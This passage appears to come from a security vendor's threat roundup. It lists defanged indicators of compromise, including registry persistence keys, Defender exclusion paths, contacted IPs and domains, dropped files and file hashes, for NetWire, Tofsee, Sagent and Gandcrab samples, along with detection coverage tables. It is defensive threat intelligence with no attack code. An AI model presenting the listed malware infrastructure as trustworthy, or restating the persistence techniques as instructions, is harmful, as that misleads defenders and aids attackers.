`\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-C5bOmi6wuVI/Xf0E0pMusxI/AAAAAAAADDM/DgO-Y8Tnpjo5x_73EK3qvEZL5Z0wzB0CACLcBGAsYHQ/s1600/f2d9a6acc6b09b4027dc558a268036a1213deecefae9952670bff42a481daaba_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-QWprkvx3V80/Xf0E6tbbHaI/AAAAAAAADDQ/JGaRh_LZzNEwhA65VYx2SQNNnSZiYop7ACLcBGAsYHQ/s1600/06b47808b96d08f6ef2089ff0d8eed4a9d448d5e6ebc4fe86321cfaecb774bc0_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.NetWire-7454096-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Registry Key Name ` | 25 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\SW\\\\ASYNCMAC \nValue Name: CustomPropertyHwIdKey ` | 1 \nMutexes | Occurrences \n---|--- \n`-` | 25 \n`KYIMEShareCachedData.MutexObject.Administrator` | 8 \n`KYTransactionServer.MutexObject.Administrator` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`85[.]206[.]175[.]225` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\~$BOSCH.xlsx` | 25 \n`%TEMP%\\Install\\Settings.ini` | 25 \n`%TEMP%\\BOSCH.xlsx` | 25 \n`%TEMP%\\Install` | 25 \n`%TEMP%\\Install\\EXCEL.exe` | 25 \n`%TEMP%\\Install\\EXCEL.vbs` | 25 \n \n#### File Hashes\n\n` 04e12a8dcf9e8f041cf1b5b7f8f48a832df5fd607bf810fb28933fbc188a8c4b 0d9bedadc3e9edbc3b84c20a651d1e0a23609e4a7f039ec36c67276e90eed205 13047457fd3aca8c5d0ce5f165ea513cbdcd128a4e0de5b7322b895e1188f680 13a210e2e5527d08b6018f2463056f1d31011ed10e696b26e10482a4b09045f6 1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92 23804d31eb2d20e90df50559281008425b584a77fad856dce360400292bc6a80 291b26c6629d51d69e7856d22f80202b7a97f0a0f364adab27f16006e77d2df2 2e8e1ad0e72ecfc4cef418a8bc25095c4b0893a561c446a6aa1b8fe56c780d8c 36115f2ed9027f14643f000815ec615d44b97e3fb5c14cc0b67fcb9e784d3bda 3ad37750ccdb9ce0a82997c591d7842d9cee5722fc03219d0cf51f6cf7ddcc00 541e9bb6c2ff220ba15fd731000327f54ca8eae9e3df4d3e4193f50bf4f5f63b 5bf1aead7b5e89d92227d0e1daa019c0927de54faad212c35775d79f1c7b5d39 5f738f026c6f20f0d7ea5808ce96f14dbcb21f47b7b98d60e577a09d43d69071 6626bc4952d2a8cf839a47a4ada71ae877b7b89ac230821d9f5f17462eef4f4c 68252e2eb44e02032d53c42fe4b4c3ed6b8773f60aa78ebb7e6d34ee51ad32bc 68aaa21c0a7e40ba3bbc90abd3d9dd259d6c21d354d219b91ccd61e5c3b52089 68fe9505234da0d57d8a6c4898a1948574698fd5d5ddd9222efad0018d3adf3c 6fca62b51ce59dbf722f5f7d242f26c09b7b02cebde3d9b8db7feacc9d76da1a 7697945d1d3d95f66f3337329d8142f709fd153ead6ac8adfce7975b8572ad04 79a505ca4c4497351ee7cdd599212bf22979421f1055527bc11797d49b8ab907 7a291dffa29a8ca2f094af686ba0c8ceff4d432d10e601273f8b9a8779899e48 88edc5c751377aaf23028562d4a979ff2ca95b61d3d128fa42b64e68e42e20b2 895c0c05ba64cbf70bc8a9587194497b3c93f53cb9e17edcaf7d506a1f58b195 8bd10e751e7df59c1ba91a71bbeadbe5dfa12cb75d0fc7fdf65007703745e31c 8f7abac012c0016d87e3f40e14cdae185193aa8a6bfcb3810c010eab9ec495c6 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YyGR5PJVZXo/Xf0FJ8VcFpI/AAAAAAAADDY/w2Z2J2WIBZo3z1vS43H9ZzETytYgNmzDwCLcBGAsYHQ/s1600/1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-uWi5I8oOgg8/Xf0FOc-g3NI/AAAAAAAADDg/p5h-4gAhZb0XtO0GrDRVrdLf8If2Gg72gCLcBGAsYHQ/s1600/1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Tofsee-7450732-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 12 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config4 ` | 8 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\gzntsagv ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jcqwvdjy ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\buionvbq ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]55[.]5[.]250` | 16 \n`43[.]231[.]4[.]7` | 16 \n`85[.]114[.]134[.]88` | 16 \n`239[.]255[.]255[.]250` | 14 \n`46[.]4[.]52[.]109` | 14 \n`192[.]0[.]47[.]59` | 14 \n`64[.]233[.]186[.]26/31` | 14 \n`173[.]194[.]66[.]26/31` | 14 \n`46[.]28[.]66[.]2` | 14 \n`78[.]31[.]67[.]23` | 14 \n`188[.]165[.]238[.]150` | 14 \n`93[.]179[.]69[.]109` | 14 \n`176[.]9[.]114[.]177` | 14 \n`67[.]195[.]228[.]110/31` | 13 \n`98[.]136[.]96[.]76/31` | 13 \n`67[.]195[.]204[.]72/30` | 13 \n`104[.]44[.]194[.]232/30` | 12 \n`98[.]136[.]96[.]74/31` | 12 \n`172[.]217[.]197[.]26/31` | 12 \n`98[.]136[.]96[.]92/31` | 12 \n`172[.]217[.]10[.]67` | 11 \n`209[.]85[.]202[.]26/31` | 11 \n`188[.]125[.]72[.]74` | 11 \n`213[.]205[.]33[.]61` | 10 \n`65[.]55[.]37[.]104` | 10 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 16 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 16 \n`schema[.]org` | 14 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 14 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 14 \n`mta5[.]am0[.]yahoodns[.]net` | 14 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 14 \n`whois[.]iana[.]org` | 14 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 14 \n`whois[.]arin[.]net` | 14 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 14 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 14 \n`irina94[.]rusgirls[.]cn` | 14 \n`anastasiasweety[.]rugirls[.]cn` | 14 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 13 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`coolsex-finders6[.]com` | 13 \n`ipinfo[.]io` | 12 \n`aol[.]com` | 12 \n`eur[.]olc[.]protection[.]outlook[.]com` | 11 \n`www[.]google[.]co[.]uk` | 11 \n`msn-com[.]olc[.]protection[.]outlook[.]com` | 9 \n`web[.]de` | 9 \n`mx[.]xtra[.]co[.]nz` | 9 \n`xtra[.]co[.]nz` | 9 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 16 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 16 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%HOMEPATH%` | 11 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 11 \n`%TEMP%\\gidjcpz.exe` | 1 \n \n#### File Hashes\n\n` 0d55086e8221871f10f204087a165112434c8db294fbedfaa6de7d2a11b55943 2b069b741778d0e16246f7a2da8738b6b21e8004cb713efc8ce845b37fc94478 2d3fbb1b7d4da1af0e07fa6fd11f1e946815ce39b3b63fdf299e4acaa9d92ff1 2e02f61e0a99dceab6e026e2e9efb9dcd2466e41e56f3f659f0ee1a4670d502d 59dcd52b18a4badf7803940e05842a52b6af9fa95fdb2ddee26145d6a393c277 60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9 886ff6f03c5e0a77cf10cbd1461e1ee666901cfdfe26854610b9deef5450bf00 8d9142db7706f1be42d3d048cea675ca6caa5dffd562595124f4e5c95771480a 9403677dc99940afcced72ed29b04a0434417883d929164d279606e9df4fe1db 94568d7086b812c0017455b1d05968726ffd137d8831ddb607fbae5d454ed073 9af4c0927e3565f27e96a8b7fb26ff0ea2d22f6f2a0bd0c6de9f993378024791 a76e2be2b3730324299bd32c7da5a04f494f79a69aeab9649aa53984c852e49a b926e4920a7b454553f73565ce89023af72ae4b6720da4110eb7fa85ff0310bf cbd7701ebc908b3ab059a9d83a3be110e8f63b0e005a41d5e0788044a65f6a14 d9520acee8a753230b372d725a3d4ba4d3caf27fd1eee7d8a8c9779424f2c077 fd1d5902802ada2adc69f071535b1523e2e3580ec2ea960e03a875687913d5de `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-7MSI84-8D-s/Xf0FfRx_qKI/AAAAAAAADDs/P3bx3KcYrKASbJ8u91VCygre0pbv-IWkwCLcBGAsYHQ/s1600/60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-I9v-Uc_HX0w/Xf0FjyXzbUI/AAAAAAAADDw/mBZ3-3X3frcKfDG4a4NPv_sacbSu27aygCLcBGAsYHQ/s1600/60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-eFo5vK1_c60/Xf0Fo4MLP5I/AAAAAAAADD0/QpWgifGLyoctq2UaFlmqvSeIoijRryWiQCLcBGAsYHQ/s1600/a76e2be2b3730324299bd32c7da5a04f494f79a69aeab9649aa53984c852e49a_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Downloader.Sagent-7454309-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\INTERFACE\\{BEF6E003-A874-101A-8BBA-00AA00300CAB} ` | 30 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 10 \n`<HKCR>\\LOCAL SETTINGS\\MUICACHE\\23\\52C64B7E \nValue Name: LanguageList ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: WOW64 ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ObjectName ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43} ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0 ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\FLAGS ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\0 ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\0\\WIN32 ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\HELPDIR ` | 2 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43} ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 10 \n`Global\\M98B68E3C` | 10 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \n`Global\\SyncRootManager` | 2 \n`Local\\C9E8AF12-FA27-4748-EC04-38CA71239739_RegisterDevice` | 2 \n`Global\\RecentDocumentsUpdate` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]104[.]45[.]107` | 18 \n`100[.]127[.]143[.]246` | 18 \n`100[.]109[.]114[.]19` | 18 \n`100[.]79[.]213[.]246` | 18 \n`100[.]67[.]20[.]29` | 18 \n`150[.]95[.]16[.]71` | 12 \n`113[.]61[.]76[.]239` | 12 \n`111[.]125[.]71[.]22` | 12 \n`80[.]11[.]158[.]65` | 10 \n`173[.]255[.]214[.]126` | 6 \n`169[.]254[.]255[.]255` | 2 \n`74[.]202[.]142[.]71` | 2 \n`96[.]126[.]121[.]64` | 2 \n`77[.]90[.]136[.]129` | 2 \n`69[.]28[.]91[.]207` | 1 \n`200[.]38[.]35[.]102` | 1 \n`96[.]127[.]149[.]2` | 1 \n`107[.]190[.]137[.]130` | 1 \n`191[.]252[.]112[.]194/31` | 1 \n`200[.]58[.]123[.]102` | 1 \n`98[.]142[.]107[.]242` | 1 \n`138[.]128[.]170[.]234` | 1 \n`65[.]99[.]252[.]200` | 1 \n`190[.]8[.]176[.]37` | 1 \n`67[.]217[.]34[.]70` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`hontam[.]net` | 30 \n`powayhomevalues[.]com` | 18 \n`gongxu[.]gfbags[.]com` | 18 \n`sabrespringshomevalues[.]com` | 18 \n`1localexpert[.]com` | 18 \n`smtpout[.]secureserver[.]net` | 2 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`mxa[.]web-hostingmx[.]com` | 1 \n`mail[.]prosyde[.]com` | 1 \n`mail[.]ledneonchile[.]cl` | 1 \n`mail[.]vieracruz[.]com` | 1 \n`bestsol[.]pe` | 1 \n`mailserver[.]dtctty[.]com` | 1 \n`mail[.]alcorsa[.]com[.]gt` | 1 \n`mail[.]imelsa[.]cl` | 1 \n`mail[.]jacto[.]com[.]ar` | 1 \n`lucanodotaciones[.]com` | 1 \n`mail[.]adevpa[.]com` | 1 \n`smtp[.]hidroil[.]com[.]ar` | 1 \n`mail[.]mpcsa[.]com[.]mx` | 1 \n`mail[.]amadisa[.]com` | 1 \n`mail[.]confirmeza[.]com[.]co` | 1 \n`mail[.]inmediprest[.]com[.]mx` | 1 \n`mail[.]nueratelecom[.]net` | 1 \n`mail[.]insurcol[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\223.exe` | 30 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 10 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-LanguagePackSetup%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-NcdAutoSetup%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-TZSync%4Operational.evtx` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\5f7b5f1e01b83767.automaticDestinations-ms` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\a4a5324453625195.automaticDestinations-ms` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\f01b4d95cf55d32a.automaticDestinations-ms` | 2 \n`\\TDLN-2060-41` | 2 \n`%LOCALAPPDATA%\\TileDataLayer\\Database\\EDB.log` | 2 \n`\\Device\\NamedPipe\\Sessions\\1\\AppContainerNamedObjects\\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCookies` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\TEMP.lnk` | 2 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\Word.Document.8` | 1 \n`%TEMP%\\CVRB4F.tmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 08214f8f4d27bc90013b2403d515dadfe992e48b104fd2748ae28b4e37c2ddd6 1bf23d80114b94336235bc3b83960f4bcecd4478effa98b92536c1e907bb70b8 26485f44831ed89fabdf3773fd36709e78b560139836a17d784ee84493e6f021 3324b01c88474616fd9701d13708f6c9ff2d2125ed14e7983ae72ea1c5a5edf2 33b3b2a6c822fa356cc251c03b4e25f5a082a126a6d10717a312436250d6682e 3528140e6db34bde7280f4284122fb7190a4606ac61a4030f91504e4a962cb93 38589a48cab122fb15dc5efa82ae023b8b467a99e60c3c183772dc3d58bd43c5 4e1659700f1d599197f6bbe2330e7c91d87578fe23bfe082dce719f6e5372e0c 4f9954159f29d6292d48986cd0ab71952357c48738dda7f59798c66241514ae9 549fa8564e7e677601d557509c9f44336cc07a8c92949cd4928017ade6c072f4 660c09d1e5ae736de0b1fea0ee93040d0240567fe7254953cd8644bb0b2e49f6 664166554198691ddfb441ac33b12f12e5d14e36b0fb5c09d35ee04bd6d68ca2 6661a70c61b67a87302e04706ff07bcb12328d74bf1d8c7c0075d3edeb8064dc 765ba4ac4d0a2d99916dc9b0e844a669c4b5c5217068741c66216d9b291cea10 899e4dff369309ab4c7c5a466dbcf642bce9788307a75efe8371cc1087714eaf 9c1d3857fa6c1dfee066d46f1ce467429e26d020036019b57e9e87aa2f8fc2ab a2717826ba6ed1d778ef8d7585ddae5c1e076da3d9cfaa9c5c8247c3c4f33ccb aa33bd6b5ac85cb8d3a4d7e511b8c513ad22f7e6b130a456e23a2d07aa89304a b35cf729a7cbf201c9b3682441e6edf65031fee775412e9887c751c1add6d3b3 b48575d226d564c2fb7235f4962d1b29e6152dcdab262157bed79c2a02f11157 c894fbda9027f90b827efebd981c2326d8761e843e5e633990bdc756240087e7 d03bed2bf79256ad1c94c6c66570e35ab54943ba921bdf295c2d0c5d12e7e982 d4b9a89ae01db11a9adf508ed1777327145eb205404a1df5020919c19068d4e0 e5c52d8f0bbb10dff3dcb0c7d055fdc5d856e8e9b2805a1560681f383c679b72 e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-sOfzBR2RcLs/Xf0GFO2qaTI/AAAAAAAADEE/4tvJstRSx4sB2bMIpTujkvu0ZW5dVPRJQCLcBGAsYHQ/s1600/e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-FVtOXQoimEA/Xf0GJx72BkI/AAAAAAAADEI/TCXd3CRSo-woM6thdkimZ-72l4c0xh3HQCLcBGAsYHQ/s1600/d4b9a89ae01db11a9adf508ed1777327145eb205404a1df5020919c19068d4e0_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ajOIztn97Ug/Xf0GP0kDCtI/AAAAAAAADEM/FU_HSIrmu8YJ7arCQncWhst1u9d72eICgCLcBGAsYHQ/s1600/1bf23d80114b94336235bc3b83960f4bcecd4478effa98b92536c1e907bb70b8_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/--fW-Vz116hE/Xf0GUGd93vI/AAAAAAAADEQ/aTLPYJ7Rw54aKbsJA_hvmM2ZQC2jmK5dACLcBGAsYHQ/s1600/e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Gandcrab-7454521-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA\\DATA ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA\\DATA \nValue Name: public ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA\\DATA \nValue Name: private ` | 22 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\D1EB23A46D17D68FD92564C2F1F1601764D8E349 \nValue Name: Blob ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\system32\\rundll32.exe ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS 